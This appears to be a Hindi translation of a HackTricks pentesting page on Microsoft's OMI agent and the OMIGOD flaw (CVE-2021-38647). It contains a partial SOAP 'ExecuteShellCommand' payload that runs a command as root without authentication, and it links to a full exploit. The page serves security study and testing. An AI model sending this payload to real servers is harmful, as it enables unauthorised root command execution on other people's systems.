8.6 KiB
5985,5986 - OMI पेंटेस्टिंग
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की आवश्यकता है? सदस्यता योजनाएं की जांच करें!
- The PEASS Family की खोज करें, हमारा विशेष NFT संग्रह
- आधिकारिक PEASS & HackTricks swag प्राप्त करें
- 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या मुझे Twitter 🐦@carlospolopm** का पालन करें**.
- अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके साझा करें.
मूलभूत जानकारी
OMI एक ओपन-सोर्स रिमोट कॉन्फ़िगरेशन मैनेजमेंट टूल है जिसे माइक्रोसॉफ्ट ने विकसित किया है। OMI एजेंट्स आमतौर पर अज़्यूर लिनक्स सर्वरों पर स्थापित होते हैं जब निम्नलिखित सेवाएं उपयोग में होती हैं:
- अज़्यूर ऑटोमेशन
- अज़्यूर स्वचालित अपडेट
- अज़्यूर ऑपरेशन प्रबंधन सुइट
- अज़्यूर लॉग विश्लेषण
- अज़्यूर कॉन्फ़िगरेशन प्रबंधन
- अज़्यूर निगरानी
जब ये सेवाएं कॉन्फ़िगर की जाती हैं, तो omiengine प्रक्रिया सभी इंटरफ़ेस पर सुनेगी और रूट उपयोगकर्ता के रूप में चलाई जाएगी।
डिफ़ॉल्ट पोर्ट: 5985(http), 5986(https)
CVE-2021-38647
16 सितंबर तक, अज़्यूर में नवीनतम रूप में बनाए गए लिनक्स सर्वर अब भी OMI एजेंट के एक संकटपूर्ण संस्करण के साथ पैकेज किए जाते हैं। एक लिनक्स सर्वर को डिप्लॉय करने और उपरोक्त सेवाओं में से कोई एक को सक्षम करने के बाद, सर्वर संकटपूर्ण स्थिति में होगा।
OMI सर्वर /wsman अंत बाइंडिंग के माध्यम से कॉन्फ़िगरेशन मैनेजमेंट संदेश प्राप्त करता है। सामान्यतः, संदेश के साथ एक प्रमाणीकरण हैडर पास किया जाता है और OMI सर्वर सुनिश्चित करेगा कि क्लाइंट प्रमाणित संचार करने के लिए अधिकृत है। इस मामले में संकटपूर्णता यह है कि जब प्रमाणीकरण हैडर नहीं होता है, तो सर्वर गलती से संदेश को स्वीकार करता है और रूट उपयोगकर्ता के तहत निर्देश को क्रियान्वित करता है।
बिना प्रमाणीकरण हेडर निर्दिष्ट किए सर्वर को "ExecuteShellCommand" SOAP पेलोड पोस्ट करके, यह रूट के रूप में कमांड को क्रियान्वित करेगा।
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
https://github.com/horizon3ai/CVE-2021-38647 में पूरा शोषण खोजें
संदर्भ
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? सदस्यता योजनाएं की जांच करें!
- खोजें The PEASS Family, हमारा विशेष संग्रह NFTs
- प्राप्त करें आधिकारिक PEASS & HackTricks swag
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे ट्विटर पर फ़ॉलो करें 🐦@carlospolopm.
- अपने हैकिंग ट्रिक्स साझा करें, hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके।